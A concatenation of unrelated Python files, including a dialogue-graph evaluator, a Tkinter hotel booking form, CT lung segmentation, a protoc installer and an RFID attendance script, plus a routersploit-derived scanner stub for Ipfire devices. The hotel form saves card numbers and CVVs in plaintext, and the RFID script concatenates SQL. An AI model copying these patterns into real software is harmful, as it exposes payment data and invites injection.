AgentDialogueTurn, DialogueTurn, HumanAgentDialogueTurn class DSTuple(t.NamedTuple): """ A dialogue state, as defined in [1]_. It represents the state of a conversation at a given turn. """ bs: t.FrozenSet[str] = frozenset() """The set of dialogue slots that are populated.""" action: t.Optional[str] = None """The action that was taken.""" actor: t.Optional[str] = None """ The actor that took the action, one of ``"HUMAN"``, ``"AGENT"`` (chatbot), or ``None`` (in the case of the starting root node of the graph). """ class ConvGraph: """ Implementation of Algorithm (1) in [1]_. Can convert a :class:`~bavard_ml_utils.types.conversations.conversation.ConversationDataset` into a conversation graph, which is useful for visualizing the different paths that an agent's conversations take, as well as for evaluating dialogue act predictions using "soft" metrics. The graph can also be used for dataset augmentation in a task-oriented-dialogue training setting. Each node in the graph is a unique dialogue state, where a dialogue state is defined as a tuple of: #. the current belief state #. the action that was taken #. the type of actor who took that action (human or chatbot). A belief state is the set of dialogue slots that are populated at a given turn. References ---------- .. [1] ., ., & . (2021). Conversation Graph: Data Augmentation, Training, and Evaluation for Non-Deterministic Dialogue Management. Transactions of the Association for Computational Linguistics, 9, 36-52. """ def __init__(self, data: ConversationDataset): self.graph = nx.DiGraph() for conv in data: last_state = DSTuple() # the starting node of the graph self.add_node(last_state) for turn in conv.turns: if turn.actor == Actor.HUMAN_AGENT: continue ds = self.encode_dialogue_state(turn) self.add_node(ds) if not self.graph.has_edge(last_state, ds): self.graph.add_edge(last_state, ds, weight=1) else: self.graph[last_state][ds]["weight"] += 1 last_state = ds def add_node(self, ds: DSTuple): """ The ``ds`` tuple is used as the node's unique id, but we also add the attributes of ``ds`` as attributes of the node, so they can be interacted with easily in the graph. """ if not self.graph.has_node(ds): bs_str = ", ".join(sorted(ds.bs)) self.graph.add_node(ds, bs=bs_str, action=ds.action, actor=ds.actor) def soft_accuracy(self, y_pred: t.List[str], last_turns: t.List[DialogueTurn]) -> float: """ Calcuates the soft accuracy, which is accuracy when there is more than one acceptable answer for a prediction. Parameters ---------- y_pred : list of str A list of agent action predictions. last_turns : list of DialogueTurn A list, having the same length as ``y_pred``, of the dialogue turns the agent action predictions in ``y_pred`` are following. For example, ``y_pred[i]`` should be the agent action which was predicted as coming after the turn ``last_turns[i]``. """ num_correct = 0 for pred, last_turn in zip(y_pred, last_turns): num_correct += self.is_pred_correct(pred, last_turn) return num_correct / len(last_turns) def balanced_soft_accuracy(self, y_pred: t.List[str], last_turns: t.List[DialogueTurn]) -> float: """Same as :meth:`soft_accuracy`, but equally weights the accuracy calculation of each class, or action.""" correct: t.Dict[str, int] = defaultdict(int) out_of: t.Dict[str, float] = defaultdict(int) for pred, last_turn in zip(y_pred, last_turns): valid_next_actions = self.get_valid_next_actions(last_turn) if pred in valid_next_actions: # The prediction was right, so give full credit. correct[pred] += 1 out_of[pred] += 1 else: # The prediction was wrong, so equally penalize each of the classes that were valid. for label in valid_next_actions: out_of[label] += 1 / len(valid_next_actions) # Compute the soft accuracy for each class/action, then return the mean of those. return mean(correct[action] / out_of[action] for action in out_of.keys()) def is_pred_correct(self, pred: str, last_turn: DialogueTurn) -> bool: valid_next_actions = self.get_valid_next_actions(last_turn) return pred in valid_next_actions def get_valid_next_actions(self, turn: DialogueTurn) -> t.Set[str]: """ Given the dialogue state of ``turn``, find the actions of all dialogue states that directly follow ``turn`` in the conversation graph. In other words, return the valid next actions that appear after `turn` in the training data the conversation graph was constructed from. """ ds = self.encode_dialogue_state(turn) return {v[1] for u, v in self.graph.out_edges(ds)} def avg_num_valid_next_actions(self) -> int: """ The average out-degree of the conversation graph, which is equal to the average number of correct agent actions for each dialogue state in the graph. """ return mean(n for _, n in self.graph.out_degree) def save(self, path: str): nx.write_graphml(self.graph, path) @staticmethod def encode_dialogue_state(turn: DialogueTurn) -> DSTuple: """ Encodes a :obj:`~bavard_ml_utils.types.conversations.dialogue_turns.DialogueTurn` into a :class:`DSTuple`. """ if isinstance(turn, HumanAgentDialogueTurn): raise AssertionError("cannot compute dialogue state for a human agent turn") belief_state_keys = list(turn.state.slotValues.keys()) if turn.state else [] action = turn.agentAction.name if isinstance(turn, AgentDialogueTurn) else turn.userAction.intent return DSTuple(bs=frozenset(belief_state_keys), action=action, actor=turn.actor.value) import sublime import sublime_plugin class PhpactorEditorActionErrorCommand(sublime_plugin.TextCommand): def run(self, edit, message, details): sublime.run_command('tk_show_status_message', { 'message': 'Phpactor Error: ' + message }) # self.view.show_popup(message, sublime.HIDE_ON_MOUSE_MOVE_AWAY)import numpy as np def dummy_median(y_actual): # dummy median predictor return np.full(y_actual.shape, np.median(y_actual))tanc7/ArmsCommander-TestBed from __future__ import absolute_import from .autopwn import Exploit as BaseScanner class Exploit(BaseScanner): """ Scanner implementation for Ipfire vulnerabilities. """ __info__ = { 'name': 'Ipfire Scanner', 'description': 'Scanner module for Ipfire devices', 'authors': [ ' ', # routersploit module ], 'references': ( '', ), 'devices': ( 'Ipfire', ), } modules = ['routers/ipfire', 'cameras/ipfire', 'misc/ipfire'] #!/usr/bin/env python from distutils.core import setup setup( name='xd', version='0.1.1', description='XML Fu', author='', author_email='', url='https://github.com/dwoz/python-xd', packages=['xd'], install_requires=[ 'tox', 'lxml', ], ) from tkinter import * import sqlite3 import tkinter as tk from tkinter import messagebox window = Tk() window.title("Hotel Room Booking Form") window.geometry('1500x800') window.configure(background = "white"); a1=StringVar() b1=StringVar() c1=StringVar() d1=StringVar() e1=IntVar() f1=IntVar() g1=StringVar() h1=StringVar() i1=StringVar() j1=StringVar() k1=IntVar() l1=StringVar() m1=IntVar() p101=StringVar() p102=StringVar() p103=StringVar() def database(): title=a1.get() fname=b1.get() lname=c1.get() share=d1.get() busno=e1.get() mobno=f1.get() email=g1.get() doa=h1.get() dod=i1.get() nmcred=j1.get() credno=k1.get() expd=l1.get() cvv=m1.get() sign=p101.get() date=p102.get() pname=p103.get() db = sqlite3.connect('hotel.db') cursor=db.cursor() cursor.execute('CREATE TABLE IF NOT EXISTS HOTEL(a1 TEXT,b1 TEXT,c1 TEXT,d1 TEXT,e1 INT,f1 INT,g1 TEXT,h1 TEXT,i1 TEXT,j1 TEXT,k1 INT,l1 TEXT,m1 INT,p101 TEXT,p102 TEXT,p103 TEXT)') cursor.execute('INSERT INTO HOTEL(a1,b1,c1,d1,e1,f1,g1,h1,i1,j1,k1,l1,m1,p101,p102,p103) VALUES(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)', (title,fname,lname,share,busno,mobno,email,doa,dod,nmcred,credno,expd,cvv,sign,date,pname)) db.commit() msg = messagebox.showinfo( "DB Demo","SUBMITTED SUCCESSFULLY") def display(): db=sqlite3.connect('hotel.db') with db: cursor=db.cursor() my_w = tk.Tk() my_w.geometry("600x250") r_set=cursor.execute('''SELECT * from HOTEL '''); i=0 for HOTEL in r_set: for j in range(len(HOTEL)): e = Entry(my_w, width=10, fg='blue') e.grid(row=i, column=j) e.insert(END, HOTEL[j]) i=i+1 a = Label(window ,text = "Title ").grid(row = 0,column = 0,sticky = "NSEW") b = Label(window ,text = "First Name ").grid(row = 1,column = 0,sticky = "NSEW") c = Label(window ,text = "Last Name ").grid(row = 2,column = 0,sticky = "NSEW") d = Label(window ,text = "Share With ").grid(row = 3,column = 0,sticky = "NSEW") e = Label(window ,text = "Buisness Number ").grid(row = 4,column = 0,sticky = "NSEW") f = Label(window ,text = "Mobile Number").grid(row = 5,column = 0,sticky = "NSEW") g = Label(window ,text = "Email Address ").grid(row = 6,column = 0,sticky = "NSEW") h = Label(window ,text = "Date of Arrival ").grid(row = 7,column = 0,sticky = "NSEW") i = Label(window ,text = "Date of Departure ").grid(row = 8,column = 0,sticky = "NSEW") j = Label(window ,text = "Name on Credit Card ").grid(row = 9,column = 0,sticky = "NSEW") k = Label(window ,text = "Credit Card Number ").grid(row = 10,column = 0,sticky = "NSEW") l = Label(window ,text = "Expiry Date ").grid(row = 11,column = 0,sticky = "NSEW") m = Label(window ,text = "CVV Number ").grid(row = 12,column = 0,sticky = "NSEW") n = Label(window ,text = "Payment Method ").grid(row = 13,column = 0,sticky = "NSEW") CheckVar1 = IntVar() CheckVar2 = IntVar() C1 = Checkbutton(window, text = "Credit Card ", variable = CheckVar1, \ onvalue = 1, offvalue = 0, height=1, \ width = 20) C1.grid(row = 13, column = 1 , sticky = "NSEW") C2 = Checkbutton(window, text = "Debit Bank Transfer ", variable = CheckVar2, \ onvalue = 1, offvalue = 0, height=1, \ width = 20) C2.grid(row = 13, column = 2 , sticky = "NSEW") p = Label(window ,text = "Negotiated Rates : ").grid(row = 14,column = 0 , sticky = "NSEW") g = Label(window ,text = "Deluxe Room Single ").grid(row = 15,column = 0 , sticky = "NSEW") g1 = Label(window ,text = " R1700 ").grid(row = 15,column = 1 , sticky = "NSEW") h = Label(window ,text = "Deluxe Room Double ").grid(row = 15,column = 2 , sticky = "NSEW") h1 = Label(window ,text = " R1700 ").grid(row = 15,column = 3 , sticky = "NSEW") g = Label(window ,text = "Suites Room Single ").grid(row = 16,column = 0 , sticky = "NSEW") g1 = Label(window ,text = " R1700 ").grid(row = 16,column = 1 , sticky = "NSEW") h = Label(window ,text = "Suites Room Double ").grid(row = 16,column = 2,sticky = "NSEW") h1 = Label(window ,text = " R1700 ").grid(row = 16,column = 3 ,sticky = "NSEW") p1 = Label(window ,text = "Room Preference : ").grid(row = 17,column = 0,sticky = "NSEW") CheckVar11 = IntVar() CheckVar22 = IntVar() C3 = Checkbutton(window, text = "King Bed ", variable = CheckVar11, \ onvalue = 1, offvalue = 0, height=1, \ width = 20) C3.grid(row = 18, column = 0) C4 = Checkbutton(window, text = "Twin - Two Single Beds ", variable = CheckVar22, \ onvalue = 1, offvalue = 0, height=1, \ width = 20) C4.grid(row = 18, column = 1) line1 = Label(window, text="The above rates are quoted per room, per night. The rates include breakfast, 14% vat, and Excludes 1% Tourism Levy\n and a voluntary R10 donation to the Arabella Community Trust that will be levies onto your account.", bg="white") line2 = Label(window, text="Total amount payable ZAR__ x_ nights = ZAR__ due to Arabella\n Hotel and Spa", bg="white") line3 = Label(window, text="Credit Card will be charged on receipt of this form and details will also be used to settle all incidentals not settle on\n departure. A copy of the final folio will be sent to you should there be any unsettled charges.", bg="white") line4 = Label(window, text="In order to qualify for the above rates, your booking needs to be made on or before 15th January 2016", bg="white") line5 = Label(window, text="Terms and conditions can be found on the next page.", bg="white") line6 = Label(window, text="The rate is valid for seven days before and after the conference dates. Check in time is 14:00 & check out time is 11:00", bg="white") line7 = Label(window, text="By your signature hereto, you are accepting all terms and conditions specified on this form and confirm that all information\n given is current and accurate.", bg="white") line1.grid(row=20, column=0,columnspan=4) line2.grid(row=21, column=0,columnspan=4) line3.grid(row=22, column=0,columnspan=4) line4.grid(row=23, column=0,columnspan=4) line5.grid(row=24, column=0,columnspan=4) line6.grid(row=25, column=0,columnspan=4) line7.grid(row=26, column=0,columnspan=4) p1 = Label(window ,text = "Signature : ").grid(row = 27,column = 0,sticky = "NSEW") p1 = Label(window ,text = "Print Name: ").grid(row = 27,column = 2,sticky = "NSEW") p1 = Label(window ,text = "Date : ").grid(row = 28,column = 0,sticky = "NSEW") a1 = Entry(window) a1.grid(row = 0,column = 1) b1 = Entry(window) b1.grid(row = 1,column = 1) c1 = Entry(window) c1.grid(row = 2,column = 1) d1 = Entry(window) d1.grid(row = 3,column = 1) e1 = Entry(window) e1.grid(row = 4,column = 1) f1 = Entry(window) f1.grid(row = 5,column = 1) g1 = Entry(window) g1.grid(row = 6,column = 1) h1 = Entry(window) h1.grid(row = 7,column = 1) i1 = Entry(window) i1.grid(row = 8,column = 1) j1 = Entry(window) j1.grid(row = 9,column = 1) k1 = Entry(window) k1.grid(row = 10,column = 1) l1 = Entry(window) l1.grid(row = 11,column = 1) m1 = Entry(window) m1.grid(row = 12,column = 1) p101 = Entry(window) p101.grid(row = 27,column = 1,sticky = "NSEW") p102 = Entry(window) p102.grid(row = 27,column = 3,sticky = "NSEW") p103 = Entry(window) p103.grid(row = 28,column = 1,sticky = "NSEW") btn = Button(window ,text="SUBMIT",command = database,width=20).grid(row=30,column=2) btn = Button(window,text="DISPLAY RECORD(s)",command=display,width=20).grid(row=30,column=3) window.mainloop() import sqlite3 my_conn = sqlite3.connect('hotel.db') import tkinter as tk from tkinter import * my_w = tk.Tk() my_w.geometry("1300x250") r_set=my_conn.execute('''SELECT * from HOTEL '''); i=0 # row value inside the loop for HOTEL in r_set: for j in range(len(HOTEL)): e = Entry(my_w, width=10, fg='blue') e.grid(row=i, column=j) e.insert(END, HOTEL[j]) i=i+1 my_w.mainloop()100-1000 # Copyright lowRISC contributors. # Licensed under the Apache License, Version 2.0, see LICENSE for details. # SPDX-License-Identifier: Apache-2.0 import logging as log from mako import exceptions from mako.template import Template from pkg_resources import resource_filename from .item import NodeType from .xbar import Xbar def generate_tb(xbar, dv_path): #xbar: Xbar -> str # list all the generate files for TB tb_files = [ "xbar_env_pkg__params.sv", "tb__xbar_connect.sv", "xbar.sim.core", "xbar.bind.sv", "Makefile" ] for fname in tb_files: tpl = Template(filename=resource_filename('tlgen', fname + '.tpl')) # some files need to be renamed if fname == "xbar.sim.core": fname = "xbar_%s_sim.core" % (xbar.name) elif fname == "xbar.bind.sv": fname = "xbar_%s_bind.sv" % (xbar.name) dv_filepath = dv_path / fname with dv_filepath.open(mode='w', encoding='UTF-8') as fout: try: fout.write(tpl.render(xbar=xbar)) except: log.error(exceptions.text_error_template().render()) from django.urls import path from users import views as user_views from django.contrib.auth import views as auth_views from users import views as user_views urlpatterns = [ path('register/', user_views.register, name='register'), path('login/', auth_views.LoginView.as_view(template_name='users/Userlogin.html'), name='login'), path('logout/', auth_views.LogoutView.as_view(template_name='users/Userlogout.html'), name='logout'), path('profile/', user_views.profile, name='profile'), ]import pickle # импорт библиотеки для сохранения объектов from os.path import exists # импорт метода для определения наличия файла def menu(num): """ Функция вывода меню :param num: сумма наличных денег :return: ответ пользователя """ print(f'Доступная сумма: {num} руб.', end='\n\n') # вывод наличных денег с добавлением пустой строки print('1. Пополнить счет') print('2. Совершить покупку') print('3. История покупок') print('4. Сбросить значения') print('5. Выход') ans = input('Введите номер пункта: ') # ввод пункт меню пользователем return ans def add(num, hist): """ Добавление суммы покупки и ее наименования покупки :param num: количество наличных денег :param hist: список покупок :return: измененное количество наличных денег и список покупок """ sale = input('Введите сумму покупки: ') # ввод суммы покупки while not sale.replace('.', '', 1).isdigit(): # пока ввод пользователя с убиранием точек не цифры sale = input('Введите сумму покупки: ') # снова ввести суммы sale = float(sale) # перевод суммы в дробный тип данных if sale > num: # если сумма покупки больше, чем сумма наличных денег print('Сумма покупки больше наличных денег') else: # иначе name = input('Введите название покупки: ') # ввод название покупки hist.append((name, sale)) # добавление названия и суммы покупки в архив истории num -= sale # вычитание суммы покупки из наличных денег save_sum((num, history)) # сохранение обновленной суммы и истории покупок return num, hist def save_sum(data): """ Сохранение данных в файле data: данные для сохранения """ with open('exp.pickle', mode='wb') as f: # открытие файла для байтовой записи pickle.dump(data, f) # запись данных в файл if exists('exp.pickle'): # если файл существует в текущем катологе with open('exp.pickle', mode='rb') as f: # то открыть его для байтого чтения num, history = pickle.load(f) # чтение данных из файла и запись в переменные else: # иначе num = 0 history = [] # объявление глобальных переменных while True: # вечный цикл ans = menu(num) # получение ответа пользователя while ans not in ['1', '2', '3', '4', '5']: # пока ответ не в списке ans = menu(num) # получение ответа пользователя if ans == '1': # если выбран ответ 1 amount = input('Введите сумму: ') # ввод добавляемой суммы наличных денег while not amount.replace('.', '', 1).isdigit(): # пока ввод пользователя с убиранием точек не цифры amount = input('Введите сумму: ') # повторить ввод суммы num += float(amount) # добавить сумму к общей сумме наличных денег save_sum((num, history)) # сохранение обновленной суммы и истории покупок elif ans == '2': # если ответ 2 num, history = add(num, history) # запустить функцию добавления продуктов elif ans == '3': # если ответ 3 for name, sale in history: # перебрать все элементы списка истории print(f'Было куплено {name} за {sale} руб.') # и вывести его elif ans == '4': # если ответ 4 num = 0 history = [] # обнуление значений переменных save_sum((num, history)) # и сохранение в файле else: # иначе break # выйти из основного цикла print() B0ney/Epic-File-Sorter PROGRAMS = ["jar","exe","bin","deb","rpm","msi","appimage","dmg"] ARCHIVES = ["zip","7z","tar","bz2","rar","xz","gz"] AUDIO = ["mp3","mp2","wav","ogg","aac","flac","alac","dsd","mqa","m4a"] VIDEO = ["mp4","mkv","flv","mov","avi","webm"] IMAGE = ["jpeg","jpg","png","bmp","gif"] DOCS = ["pdf","txt","odt","docx","rtf"] SLIDES = ["ppt","odp","pptx"] SPREADSHEET = ["xlsx"]# Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from typing import Any, Dict, List from pandas import DataFrame, isnull from lib.cast import safe_int_cast from lib.data_source import DataSource from lib.time import datetime_isoformat, date_offset from lib.utils import get_or_default class OurWorldInDataSource(DataSource): @staticmethod def _adjust_date(data: DataFrame, metadata: DataFrame) -> DataFrame: """ Adjust the date of the data based on the report offset """ # Save the current columns to filter others out at the end data_columns = data.columns # Filter auxiliary dataset to only get the relevant keys data = data.merge(metadata, suffixes=("", "aux_"), how="left") # Perform date adjustment for all records so date is consistent across datasets data.aggregate_report_offset = data.aggregate_report_offset.apply(safe_int_cast) data["date"] = data.apply( lambda x: date_offset(x["date"], get_or_default(x, "aggregate_report_offset", 0)), axis=1, ) return data[data_columns] def parse_dataframes( self, dataframes: List[DataFrame], aux: Dict[str, DataFrame], **parse_opts ) -> DataFrame: data = ( dataframes[0] .rename( columns={ "iso_code": "3166-1-alpha-3", "new_cases": "new_confirmed", "new_deaths": "new_deceased", "new_tests": "new_tested", "total_cases": "total_confirmed", "total_deaths": "total_deceased", "total_tests": "total_tested", } ) .merge(aux["country_codes"]) ) # Adjust the date of the records to match local reporting data = self._adjust_date(data, aux["metadata"]) return data import os import logging import socket from mcrcon import MCRcon log = logging.getLogger("bot") # get RCON credentials RCON_URL = os.getenv('RCON_URL') RCON_PASSWORD = os.getenv('RCON_PASSWORD') # check that the Minecraft server is responsive def get_rcon_status(): log.info(f"get_rcon_status: getting status...") try: return submit_rcon_command("list").startswith("There") except socket.timeout: log.info(f"get_rcon_status: Connection timed out, returning False") return False except ConnectionRefusedError: log.info(f"get_rcon_status: Connection refused, returning False") return False # get player list # Use get_rcon_status() to check server is available before using def get_player_list(): resp = submit_rcon_command("list") if resp.startswith('There are 0'): return "There are no players currently playing." else: return resp.replace('_', '\_') # submit a command to the server # Use get_rcon_status() to check server is available before using def submit_rcon_command(cmd: str): log.info(f"rcon_submit: submitting command {cmd} to url {RCON_URL}...") with MCRcon(RCON_URL, RCON_PASSWORD) as mcr: return mcr.command(cmd)import StudentHandler import TeacherHandler import webapp2 app = webapp2.WSGIApplication([ ('/', StudentHandler.Default), ('/student', StudentHandler.SubmitStudent), ('/student/(\d+)', StudentHandler.SingleStudent), ('/statistics/studentperquarter/(\d+)', StudentHandler.QuaterAnalysis), ('/statistics/quarter/(\d+)', StudentHandler.SubjectAnalysis), ('/statistics/quarter', StudentHandler.SubjectQuaterAnalysis), ('/teacher/statistics/quarter', TeacherHandler.DisplaySubjectQuaterAnalysis), ('/teacher/statistics/quarter/(\d+)', TeacherHandler.DisplaySubjectAnalysis), ('/teacher/statistics/studentperquarter/(\d+)', TeacherHandler.DisplayQuaterAnalysis), ('/teacher', TeacherHandler.MainForm), ], debug=True)class Firmware: def __init__(self): self.version = None self.sign_method = None self.sign = None self.file_url = None self.file_size = None #!/usr/bin/python3 import os import re import glob import numpy as np import SimpleITK as sitk from psutil import cpu_count from operator import sub num_threads = cpu_count(logical=False) print(' Set number of threads to ', num_threads) os.environ["OMP_NUM_THREADS"] = str(num_threads) os.environ['ITK_GLOBAL_DEFAULT_NUMBER_OF_THREADS'] = str(num_threads) sitk.ProcessObject.SetGlobalDefaultNumberOfThreads(num_threads) ############################################################################### def alphanum_key(s): """ Turn a string into a list of string and number chunks. "z23a" -> ["z", 23, "a"] """ return [tryint(c) for c in re.split('([0-9]+)', s)] def tryint(s): try: return int(s) except: return s def list_files(dirpath, dirnames): curpath = os.getcwd() os.chdir(dirpath) f = glob.glob(dirnames) f.sort(key=alphanum_key) os.chdir(curpath) return f ############################################################################### def read_dicom(files): """ read dicom images from directory :param files: dir path that contain the dicom files :return: simpleitk image """ reader = sitk.ImageSeriesReader() dicom_names = reader.GetGDCMSeriesFileNames(files) reader.SetFileNames(dicom_names) return reader.Execute() ############################################################################### def normalise_image(image_sitk): """ :param image_sitk: :return: """ # suppress an pixel less than 20-percentile to be a background and vice versa image_array = sitk.GetArrayFromImage(image_sitk) pixels = image_array.ravel() q20 = np.quantile(pixels, 0.2) q90 = np.quantile(pixels, 0.9) norm_image = sitk.Clamp(image_sitk, lowerBound=q20, upperBound=q90) norm_image = (norm_image - pixels.mean()) / pixels.std() return sitk.RescaleIntensity(norm_image) ############################################################################### def segment_body(image_sitk): """ :param image_sitk: :return: """ # select seed point in the background seed = image_sitk.GetSize() seed = tuple(map(sub, seed, (1, 1, 1))) # region growing from the seed point seg_con = sitk.ConnectedThreshold(image_sitk, seedList=[seed], lower=-1, upper=100) # sitk.WriteImage(seg_con, 'seg_con.nii.gz') # some morphological operations to get rid of isolated islands in the background vectorRadius = (20, 20, 20) kernel = sitk.sitkBall seg_clean = sitk.BinaryMorphologicalClosing(seg_con, vectorRadius, kernel) # sitk.WriteImage(seg_clean, 'seg_clean.nii.gz') # reverse background mask values to get the body mask body_mask_0 = seg_clean == 0 # more morphological operations to clean the body mask vectorRadius = (3, 3, 3) body_mask_0 = sitk.BinaryMorphologicalOpening(body_mask_0, vectorRadius, kernel) # sitk.WriteImage(body_mask_0, 'body_mask_0.nii.gz') print('Refining body mask...') # find biggest connected component, which is supposed to be the body body_mask = sitk.ConnectedComponent(body_mask_0) # sitk.WriteImage(body_mask, 'body_mask_1.nii.gz') stats = sitk.LabelShapeStatisticsImageFilter() stats.Execute(body_mask) # filter out smaller components label_sizes = [stats.GetNumberOfPixels(l) for l in stats.GetLabels()] biggest_labels = np.argsort(label_sizes)[::-1] return body_mask == stats.GetLabels()[biggest_labels[0]] # biggest component has the highest label value ############################################################################### def segment_lungs(image_stik): """ :param image_stik: :return: """ # Binary threshold extracted_lungs_0 = sitk.BinaryThreshold(image_stik, lowerThreshold=20., upperThreshold=50.) # sitk.WriteImage(extracted_lungs_0, 'extracted_lungs_0.nii.gz') # some morphological operations to get rid of isolated islands in the background vectorRadius = (5, 5, 5) kernel = sitk.sitkBall extracted_lungs_1 = sitk.BinaryMorphologicalClosing(extracted_lungs_0, vectorRadius, kernel) vectorRadius = (2, 2, 2) extracted_lungs_1 = sitk.BinaryMorphologicalOpening(extracted_lungs_1, vectorRadius, kernel) # sitk.WriteImage(extracted_lungs_1, 'extracted_lungs_1.nii.gz') # find biggest connected component, which is supposed to be the body extracted_lungs_2 = sitk.ConnectedComponent(extracted_lungs_1) # sitk.WriteImage(extracted_lungs_2, 'extracted_lungs_2.nii.gz') # find biggest components stats = sitk.LabelShapeStatisticsImageFilter() stats.Execute(extracted_lungs_2) # filter out smaller components label_sizes = [stats.GetNumberOfPixels(l) for l in stats.GetLabels()] biggest_labels = np.argsort(label_sizes)[::-1] # biggest two components are the right and left lungs right_lung = extracted_lungs_2 == stats.GetLabels()[biggest_labels[0]] left_lung = extracted_lungs_2 == stats.GetLabels()[biggest_labels[1]] # some morphological operations to get rid of isolated islands in the background print('Refining lung masks...') left_lung = sitk.BinaryFillhole(left_lung) right_lung = sitk.BinaryFillhole(right_lung) vectorRadius = (20, 20, 20) right_lung = sitk.BinaryMorphologicalClosing(right_lung, vectorRadius, kernel) left_lung = sitk.BinaryMorphologicalClosing(left_lung, vectorRadius, kernel) vectorRadius = (2, 2, 2) right_lung = sitk.BinaryMorphologicalOpening(right_lung, vectorRadius, kernel) left_lung = sitk.BinaryMorphologicalOpening(left_lung, vectorRadius, kernel) vectorRadius = (20, 20, 20) right_lung = sitk.BinaryMorphologicalClosing(right_lung, vectorRadius, kernel) left_lung = sitk.BinaryMorphologicalClosing(left_lung, vectorRadius, kernel) # dilate the mask 2 pixels to recover the smoothing effect right_lung = sitk.BinaryDilate(right_lung, 2, kernel) left_lung = sitk.BinaryDilate(left_lung, 2, kernel) return right_lung + 2 * left_lung # return merged labels ############################################################################### # Read nifti # data_dir = '/Users/amiralansary/PycharmProjects/covid-19/data/nifti/Positive' data_dir = '/Users/amiralansary/PycharmProjects/covid-19/data/nifti/Negative' cases = list_files(data_dir, '*') for index, case in enumerate(cases): print('=' * 20) case_path = os.path.join(data_dir, case) filename = list_files(case_path, '*.nii.gz')[0] image_path = os.path.join(case_path, filename) save_path = image_path[:-7] print('Processing subject [{}/{}] - {} ...'.format(index+1, len(cases), image_path)) image_sitk = sitk.ReadImage(image_path) print('Normalising...') norm_image_sitk = normalise_image(image_sitk) sitk.WriteImage(norm_image_sitk, save_path + '_normalised.nii.gz') print('Done!') print('Smoothing...') smooth_image_sitk = sitk.SmoothingRecursiveGaussian(norm_image_sitk, 2.) sitk.WriteImage(smooth_image_sitk, save_path + '_smooth2.nii.gz') print('Done!') print('Segmenting body...') body_sitk = segment_body(smooth_image_sitk) sitk.WriteImage(body_sitk, save_path + '_body.nii.gz') print('Done!') print('Segmenting lungs...') # mask normalised image to get rid of background body_masked_sitk = sitk.Mask(smooth_image_sitk, body_sitk) lungs_sitk = segment_lungs(body_masked_sitk) sitk.WriteImage(lungs_sitk, save_path + '_lungs.nii.gz') print('Done!') import requests from zipfile import ZipFile, ZipInfo import os import pathlib from proto_builder.core.file_utils import delete_folder, delete_file from proto_builder.core.check import check_go, check_node from proto_builder.core.bin_manager import get_platform, ProtoBin import proto_builder import click ROOT_FOLDER = pathlib.Path(proto_builder.__file__).parent # Folder where the protoc binary will be stored after download. PROTOC_ROOT_BIN_FOLDER = ROOT_FOLDER.joinpath("protobin") # Folder where the build result from Kotlin will be, variable used for clean up only. BUILD_FOLDER = ROOT_FOLDER.joinpath("build") class ZipFileWithPermissions(ZipFile): """Custom ZipFile class handling file permissions.""" def _extract_member(self, member, targetpath, pwd): if not isinstance(member, ZipInfo): member = self.getinfo(member) targetpath = super()._extract_member(member, targetpath, pwd) attr = member.external_attr >> 16 if attr != 0: os.chmod(targetpath, attr) return targetpath def download_file(url: str): """ Download file from an url. :param url Address from the file to be downloaded. """ r = requests.get(url) filename = url.split("/")[-1] open(filename, "wb").write(r.content) def setup(): """ Initialize all necessary files. This will download and install all necessary files to build the libraries for Go and Kotlin. """ system = get_platform() download_file(system.proto_c_url) with ZipFileWithPermissions(system.proto_c_zip_file_name, "r") as zip_ref: zip_ref.extractall(PROTOC_ROOT_BIN_FOLDER) delete_file(system.proto_c_zip_file_name) click.secho("Protoc binary downloaded and extracted", fg='green') setup_go() setup_node() click.secho(f"Finish setup. Binaries are on folder {PROTOC_ROOT_BIN_FOLDER}", fg='green') def setup_go(): """Check if all dependencies for Go are installed on the system. And install the necessary libraries.""" if not check_go(): raise SystemError("Install Go before proceeding.") os.system(""" go install google.golang.org/grpc/cmd/protoc-gen-go-grpc@latest go install google.golang.org/protobuf/cmd/protoc-gen-go@latest """) click.secho("Finish installing go plugin for protoc", fg='green') def setup_node(): """ Check if all dependencies for Typescript are installed on the system. And install the necessary libraries. """ if not check_node(): raise SystemError("Install Node before proceeding.") click.secho("Installing proto-gen-ts to generate typescript files.") os.chdir(f"{PROTOC_ROOT_BIN_FOLDER}/bin") os.system("npm install protoc-gen-ts") click.secho("Protoc-web plugin for TS downloaded and extracted", fg='green') def clean_setup(): """Clean everything that was created by the setup execution.""" click.secho("Removing all folders created when executing setup command.", fg='red') delete_folder(PROTOC_ROOT_BIN_FOLDER, BUILD_FOLDER) teguhsiswanto87/SO_AbsensiKehadiran #!/usr/bin/env python import time import RPi.GPIO as GPIO from mfrc522 import SimpleMFRC522 import mysql.connector db = mysql.connector.connect( host="localhost", user="root", passwd="", database="so_absensi" ) cursor = db.cursor() reader = SimpleMFRC522() try: while True: id, text = reader.read() cursor.execute("Select id_rfid, username FROM anggota WHERE id_rfid="+str(id)) result = cursor.fetchone() if cursor.rowcount >= 1: cursor.execute("INSERT INTO absensi (username) VALUES (%s)", (result[0],) ) db.commit() time.sleep(2) finally: GPIO.cleanup()jjberg83/python_eksperimenter #!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Wed Oct 13 08:56:01 2021 @author: jjberg """ """ Person Relation father Leia sister Han brother in law R2D2 droid relation_to_luke("") ➞ "Luke, I am your father." relation_to_luke("Leia") ➞ "Luke, I am your sister." relation_to_luke("Han") ➞ "Luke, I am your brother in law." """ def relation_to_luke(name): catalogue = { '': 'father', 'Leia': 'sister', 'Han': 'brother in law', 'R2D2': 'droid', } #return f'Luke, I am your {catalogue[name]}.' return 'Luke, I am your {}'.format(catalogue[name]) print(relation_to_luke('')) print(relation_to_luke('Leia')) print(relation_to_luke('Han')) print(relation_to_luke('R2D2')) metalibm/metalibm-clone10-100 # -*- coding: utf-8 -*- ############################################################################### # This file is part of metalibm (https://github.com/kalray/metalibm) ############################################################################### # MIT License # # Copyright (c) 2018 Kalray # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the 